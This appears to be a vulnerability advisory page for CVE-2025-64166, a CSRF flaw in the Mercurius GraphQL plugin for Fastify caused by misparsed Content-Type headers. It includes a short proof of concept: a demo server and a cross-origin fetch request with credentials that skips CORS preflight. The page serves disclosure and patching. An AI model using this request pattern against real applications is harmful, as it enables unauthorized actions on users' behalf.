CVE-2025-64166

MEDIUM5.4EPSS 0.01%

Mercurius: Incorrect Content-Type parsing can lead to CSRF attack

發布日:2026/3/5修改日:2026/3/5
也稱為:GHSA-v66j-6wwf-jc57

描述

### Summary A Cross-Site Request Forgery (CSRF) vulnerability was identified in Mercurius versions 16. The issue arises from incorrect parsing of the `Content-Type` header in requests. Specifically, requests with `Content-Type` values such as `application/x-www-form-urlencoded`, `multipart/form-data`, or `text/plain` could be misinterpreted as `application/json`. This misinterpretation bypasses the preflight checks performed by the `fetch()` API, potentially allowing unauthorized actions to be performed on behalf of an authenticated user. --- ### Impact An attacker could exploit this vulnerability by crafting a malicious request with a `Content-Type` that Fastify incorrectly parses as `application/json`. When such a request is made from a different origin, it bypasses the Cross-Origin Resource Sharing (CORS) protections, leading to a potential CSRF attack. This could result in unauthorized actions being performed on behalf of an authenticated user without their consent. --- ### Proof of Concept ```javascript // Server-side Fastify setup const Fastify = require('fastify'); const mercurius = require('mercurius'); const app = Fastify(); const schema = ` type Query { hello(name: String): String } `; const resolvers = { Query: { hello: (_, { name }) => `Hello ${name || 'World'}!` } }; app.register(mercurius, { schema, resolvers }); app.listen(3000, () => { console.log('Server listening on http://localhost:3000'); }); ``` ```javascript // Malicious client-side code fetch('http://localhost:3000/graphql', { method: 'POST', body: JSON.stringify({ query: '{ hello(name: "attacker") }' }), headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, credentials: 'include' }); ``` In the above example, the malicious request is crafted to exploit the CSRF vulnerability by using a `Content-Type` that Fastify incorrectly parses as `application/json`. --- ### Mitigation To address this vulnerability, CSRF protection has been implemented. ## References * https://github.com/mercurius-js/mercurius/pull/1187

受影響套件(1)

CVSS 分數

來源版本嚴重程度向量
osvCVSS 3.1MEDIUM5.4CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

參考連結(5)